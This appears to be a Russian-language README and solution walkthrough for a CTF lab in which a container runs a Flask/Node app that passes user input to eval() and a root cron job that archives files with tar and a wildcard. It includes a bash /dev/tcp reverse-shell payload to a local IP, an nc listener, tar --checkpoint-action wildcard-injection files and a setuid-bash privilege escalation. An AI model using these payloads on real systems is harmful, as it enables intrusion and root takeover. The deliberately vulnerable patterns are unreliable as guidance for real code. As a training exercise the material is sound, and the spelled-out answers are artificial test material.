# 🛡️ CTF: JavaScript Eval и Эксплуатация cron + tar (Wildcard Injection)

## 📦 Запуск

Для запуска задания воспользуйтесь `startup.sh`:

```bash
chmod +x startup.sh
./startup.sh
```

Будет запущен один контейнер `safe-eval-container` с уязвимым Node.js/Flask приложением и активным cron-процессом.

---

## 🕳️ Реализованные уязвимости

### 1. Использование небезопасного `eval` в Node.js

**Описание:**  
Во Flask-приложении пользовательский ввод передаётся как аргумент в `node -e`, где выполняется через `eval()`. Это позволяет атакующему выполнять произвольные JavaScript-команды.

**Как эксплуатировать:**

Пример полезной команды для получения командной оболочки (Reverse Shell):

```javascript
require('child_process').execSync('bash -c "bash -i >& /dev/tcp/172.17.0.1/4444 0>&1"')
```

⚠️ Перед этим запустите прослушивание на хосте:

```bash
nc -lvnp 4444
```

---

### 2. Хранение секретов и флагов в системе

После получения shell от имени пользователя `webuser` можно найти:

- `/home/webuser/user.txt` — пользовательский флаг.  
- `/opt/app/readme.txt` — подсказка к следующему этапу.

Пример:

```bash
cat user.txt
cat /opt/app/readme.txt
```

---

### 3. Wildcard Injection через `tar` в `cron`

**Описание:**  
В системе настроен cron, который ежеминутно архивирует содержимое `/var/logs/` с помощью команды:

```bash
tar -czf /backup/logs-<timestamp>.tar *
```

Это делает возможным эксплуатацию wildcard-инъекции, при которой срабатывают специальные файлы-паразиты с префиксом `--`.

**Как эксплуатировать:**

1. Получив shell, перейдите в `/var/logs/`:

    ```bash
    cd /var/logs/
    ```

2. Создайте следующие файлы:

    ```bash
    echo "" > "--checkpoint-action=exec=sh shell.sh"
    echo "" > "--checkpoint=1"
    ```

3. Создайте исполняемый `shell.sh`, например:

    ```bash
    #!/bin/bash
    cp /bin/bash /tmp/rootbash
    chmod +s /tmp/rootbash
    ```

4. Сделайте его исполняемым:

    ```bash
    chmod +x shell.sh
    ```

Через минуту `cron` выполнит `tar` с wildcard и запустит `shell.sh` от имени `root`.

5. Получите root shell:

    ```bash
    /tmp/rootbash -p
    ```

6. Получите флаг:

    ```bash
    cat /root/root.txt
    ```

---

## ✅ Флаги

- `user.txt` — находится в домашней директории пользователя `webuser`.  
- `root.txt` — находится в `/root`, доступен только после успешной эскалации привилегий.
